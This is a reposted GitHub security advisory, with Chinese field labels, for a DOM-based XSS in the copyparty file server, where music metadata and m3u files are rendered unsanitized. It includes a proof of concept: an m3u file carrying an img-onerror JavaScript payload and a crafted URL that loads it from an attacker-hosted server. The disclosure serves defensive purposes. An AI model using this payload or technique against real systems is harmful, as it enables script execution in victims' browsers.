copyparty has DOM-Based XSS vulnerability when displaying multimedia metadata

链接： https://github.com/advisories/GHSA-9q4r-x2hj-jmvr

仓库 Star： 5260

CVSS 评分： 5.4

参考链接：

• https://github.com/9001/copyparty/security/advisories/GHSA-9q4r-x2hj-jmvr

• https://github.com/9001/copyparty/commit/895880aeb0be0813ddf732487596633f8f9fc3a6

• https://github.com/9001/copyparty/releases/tag/v1.18.5

• https://github.com/advisories/GHSA-9q4r-x2hj-jmvr

描述：

Summary

An unauthenticated attacker is able to execute arbitrary JavaScript code in a victim’s browser due to improper sanitization of multimedia tags in music files, including m3u files.

Details

Multimedia metadata is rendered in the web-app without sanitization. This can be exploited in two ways:

• a user which has the necessary permission for uploading files can upload a song with an artist-name such as <img src=x onerror=alert(document.domain)>
• an unauthenticated user can trick another user into clicking a malicious URL, performing this same exploit using an externally-hosted m3u file

The CVE score and PoC is based on the m3u approach, which results in a higher severity.

PoC

1. Create a file named song.m3u with the following content. Host this file on an attacker-controlled web server.

   #EXTM3U
   #EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)>
   http://example.com/audio.mp3

2. Craft and share the malicious URL:

   http://127.0.0.1:3923/#m3u=https://example.com/song.m3u

Impact

Any user that accesses this malicious URL is impacted.